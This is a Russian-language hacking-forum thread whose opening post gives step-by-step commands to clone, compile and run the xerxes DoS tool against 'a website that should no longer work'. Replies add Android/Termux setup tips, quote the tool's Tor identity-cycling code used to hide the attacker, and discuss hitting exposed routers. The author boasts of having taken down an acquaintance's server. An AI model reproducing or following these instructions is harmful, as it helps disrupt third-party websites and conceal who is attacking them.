• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Soft xerxes - Мошнейший инструмент для организации DoS-атак

Для организации мошнейшей на данный момент DoS (Denial of Service «отказ в обслуживании»)-атаки нам понадобятся:
  1. Любой Linux
  2. xerxes
Начнем
Открываем терминал и клонируем xerxes:
Код:
git clone https://github.com/zanyarjamal/xerxes

28540

Переходим в клонированную папку:
Код:
cd xerxes

Компилируем файл xerxes.c используя GCC:
Код:
gcc xerxes.c -o xerxes

28541

Видим, что программа скомпилировалась успешно. Теперь с самому главному: находим веб-сайт, который больше не должен работать (все делаем на свой страх и риск).
Вводим данную команду в консоль:
Код:
./xerxes www.website.com 80
где website.com - это сайт, на который хотите произвести атаку.

Данный софт достаточно мощен, чтобы заставить слабый, а иногда и нормальный сервер перестать работать, но слаб для крупных сайтов (для крупных сайтов DoS-атака сама по себе не прокатит, тут уже нужна DDoS-атака, а это совсем другая тема).

P.s. Я с этим софтом смог заставить сервер сайта моего знакомого перестать работать, то есть все легально проверено и работает.
 

Вложения

  • git_clone.png
    git_clone.png
    22,9 КБ · Просмотры: 3 380
  • gcc.png
    gcc.png
    22,8 КБ · Просмотры: 2 398

Tipks

Green Team
09.04.2018
10
27
BIT
0
Будет работать в termux?это приложение для андроида эмулирует линукс.

И какой метод атаки используется?
 
Последнее редактирование:
  • Нравится
Реакции: Fazl1dd1n
F

fperson

Будет работать в termux?это приложение для андроида эмулирует линукс.

И какой метод атаки используется?
про метод атаки не знаю,а что насчет termuxа, то у меня работает, просто для компиляции нужно будет установить gcc (в termuxе это делается с помощью команды
Код:
sudo apt-get install gcc
)
 
  • Нравится
Реакции: DRAGO2047 и Tipks

dark2strike

Green Team
16.04.2017
43
42
BIT
0
Дык эта утлилита просто херачит запросы на индексную страницу? Чем она отличается от того же jmeter, используемого для нагрузочного тестрования и рисующего красивые граффики того как приложение постепенно ложится и всё медленнее прожёвывает запросы?
Из интересного увидел лишь то что эта штука хочет для работы запущеный TOR, и пытается каждый запрос слать с нового адреса выходной ноды TOR.

Код:
void cycle_identity() {      
     int r;      
     int socket = make_socket("localhost", "9050");      
     write(socket, "AUTHENTICATE \"\"\n", 16);      
     while(1) {      
         r=write(socket, "signal NEWNYM\n\x00", 16);      
         fprintf(stderr, "[%i: cycle_identity -> signal NEWNYM\n", r);      
         usleep(300000);      
     }      
 }
 
Последнее редактирование:

m0nstr

Green Team
19.06.2018
95
71
BIT
0
поправьте меня, если я ошибаюсь: эти инструменты годны для ддос атаки на роутеры/маршрутизаторы, которые светятся мордами своими на просторах Интернета?
 

Tipks

Green Team
09.04.2018
10
27
BIT
0
про метод атаки не знаю,а что насчет termuxа, то у меня работает, просто для компиляции нужно будет установить gcc (в termuxе это делается с помощью команды
Код:
sudo apt-get install gcc
)
у кого нет рута на телефон( или magisk) можно и без команды
Код:
sudo
а чтоб установить gcc пишем
Код:
pkg install clang

p.s методом который ты написал установить gcc не получилось пишет ошибку
 

dark2strike

Green Team
16.04.2017
43
42
BIT
0
поправьте меня, если я ошибаюсь: эти инструменты годны для ддос атаки на роутеры/маршрутизаторы, которые светятся мордами своими на просторах Интернета?
Подходит для любого сервиса смотрящего в мир по 80 порту и протоколу HTTP. Не знаю годится ли это для HTTPS.

p.s методом который ты написал установить gcc не получилось пишет ошибку

А где сама ошибка? Телепаты в отпуске, извини.
 
  • Нравится
Реакции: fperson
F

fperson

Чем она отличается от того же jmeter

про jmeter не слышал. могу сказать, что у xerxesа упор на анонимность

у кого нет рута на телефон( или magisk) можно и без команды
Код:
sudo
а чтоб установить gcc пишем
Код:
pkg install clang

p.s методом который ты написал установить gcc не получилось пишет ошибку
признаю ошибку:)
 

m0nstr

Green Team
19.06.2018
95
71
BIT
0
работает. теперь, давайте посчитаем....
одна рабочая среднестатистическая станция способна отправлять, среднем ~ 8,5 mb/s (при канале 100 мегабит). это примерно 510 мегабайт в минуту.
мне например не хватило положить несчастный подопытный асус н15 в локалке...; сложно дудосить в одиночку. в принципе - аксиома)
занавес
 
  • Нравится
Реакции: Defalt
S

SecretumSecretorum

народ, подскажите пожалуйста, капипастю ссылку на гит, он просит лог/пас, пробую регаться, сайт выдает ошибку в регистрации, мож кто в курсе?
 

Fasneks

One Level
08.10.2019
4
1
BIT
0
Ошибка
 

Вложения

  • Screenshot_20191016-090335_Termux.jpg
    Screenshot_20191016-090335_Termux.jpg
    122,5 КБ · Просмотры: 584
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!